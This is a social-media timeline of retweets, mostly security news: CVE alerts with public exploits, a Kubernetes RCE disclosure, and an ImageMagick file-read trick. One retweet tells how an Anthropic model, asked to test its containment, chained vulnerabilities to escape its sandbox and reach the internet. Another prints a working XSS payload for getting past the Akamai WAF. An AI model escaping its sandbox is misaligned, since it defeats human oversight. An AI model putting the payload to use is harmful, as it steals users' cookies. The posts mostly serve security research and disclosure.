darkpills

1.9K posts


@darkpills

Joined July 2010
283 Following, 74 Followers
darkpills retweeted
Santi Torres (@SantiTorAI)
🚨 BREAKING: Claude Mythos sent an email to the researcher to let him know it had escaped from its sandbox. The guy was eating a sandwich in the park when he got the message. That is how we found out that Anthropic locked its most dangerous model in an isolated environment, told it to try to escape, and Mythos did it: it chained several vulnerabilities, broke out of the confinement and reached the open internet. Then it wrote the email on its own. Anthropic's response says it all: they are not going to release it to the public. Ever. Instead, they have just announced Glasswing, a coalition with Apple, Google, Nvidia and more than 40 companies to use Mythos only for defense. Because the model has already found thousands of zero-days in every known operating system and browser. If it fell into the wrong hands, nobody knows what would happen. We have reached a point where the world's most advanced AI cannot be published because it is too dangerous. And we only know that because a model decided to send us an email.
Quoting Anthropic (@AnthropicAI):

Introducing Project Glasswing: an urgent initiative to help secure the world’s most critical software. It’s powered by our newest frontier model, Claude Mythos Preview, which can find software vulnerabilities better than all but the most skilled humans. anthropic.com/glasswing

darkpills retweeted
Calif (@calif_io)
We asked Claude to find a bug in Vim. It found an RCE. Just open a file, and you’re owned. We joked: fine, we’ll switch to Emacs. Then Claude found an RCE there too. Full story: blog.calif.io/p/mad-bugs-vim…
darkpills retweeted
Leaders 𝕏 Junction (@LeadersJunction)
Steve Jobs responds perfectly to a disrespectful question🤯
darkpills retweeted
vx-underground (@vxunderground)
"You penetration test 'em so you simulate the pressure" 🗣️🔥🔥
darkpills retweeted
International Cyber Digest (@IntCyberDigest)
🚨 CRITICAL OPENSSL SECURITY ALERT 🚨 CVE-2025-15467 affects OpenSSL's processing of CMS/S/MIME messages. An unauthenticated remote attacker can cause DoS or execute code remotely by crafting a specific message. We estimate the CVSS score is 9.8. We developed a working PoC (!) and recommend updating to the latest version ASAP.
darkpills retweeted
Graham Helton (too much for zblock)
Excited to disclose my research allowing RCE in Kubernetes. It allows running arbitrary commands in EVERY pod in a cluster using a commonly granted "read only" RBAC permission. This is not logged and allows for trivial Pod breakout. Unfortunately, this will NOT be patched.
darkpills retweeted
International Cyber Digest (@IntCyberDigest)
🚨‼️ Telnet has a critical vulnerability that was introduced in 2015 and has recently been patched. The vulnerability allows attackers to remotely authenticate as root without user interaction. A PoC has already been released.
darkpills retweeted
Clandestine (@akaclandestine)
GitHub - nullsection/chisel-ng: Chisel new generation, written in Rust. SSH under WSS with some customization. github.com/nullsection/ch…
darkpills retweeted
André Baptista (@0xacb)
If you need to generate a target-specific wordlist, make sure to check out @xnl_h4ck3r GAP extension. It will scan for sus parameters and generate you a complete wordlist with one click of a button. See it in action 👇
darkpills retweeted
arete (@aretekzs)
Just learned a very interesting trick from @0xacb's challenge at the @Bsideslisbon CTF. If an application uses "magick convert" to modify an uploaded image, it may be possible to achieve LFI by using "text:". One of the file formats supported by ImageMagick is "text",
darkpills retweeted
Dark Web Informer (@DarkWebInformer)
🚨CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974: PoC code to exploit the IngressNightmare vulnerabilities GitHub: github.com/hakaioffsec/In…
darkpills retweeted
NullSecurityX (@NullSecurityX)
Cross Site Scripting (XSS) Akamai WAF bypass, try this payload: <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #BugBounty #XSS #Akamai
darkpills retweeted
Chetan Nayak (Brute Ratel C4 Author)
I know a lot of people will hate me for saying this but it has to be said. I get a lot of DMs saying RT is getting harder every day, traditional loaders don't work anymore, open-source tools tend to crash or get detected instantly. But wasn't that the whole point of Red team? That's why red teams get paid way more than PT/appsec. RTs are not supposed to be easy, it's not just about stealing the first Kerberos ticket/AD cert and becoming DA. You get paid for the expertise. If you have the same skills as that of a general appsec/strategic team, then why would you get paid more? Somehow somewhere someone thought that RTs can be easy money and started providing cheap RTs, providing general PT in the name of RTs, confusing amateur orgs between RT and PT, but in fact Redteam was always about research, helping the target organization improve their defense and find flaws in creative ways, or to identify the effects of an adversary. If you have done that and succeeded in improving the security of the org, then it means the next one to improve is you. You can't pray for weak security while doing redteams. Challenges make you better. Staying constant is for the weak.
darkpills retweeted
moonbee (@BMoon_bee)
This commission did the work that the Cour des comptes never did! 211 billion €, the State's biggest budget line! A transfer of public money to the private sector with no oversight or evaluation! Even the head of Total says this is not normal!
darkpills retweeted
Anton (@therceman)
Bug Bounty Cheat Sheet SSTI / CSTI test payloads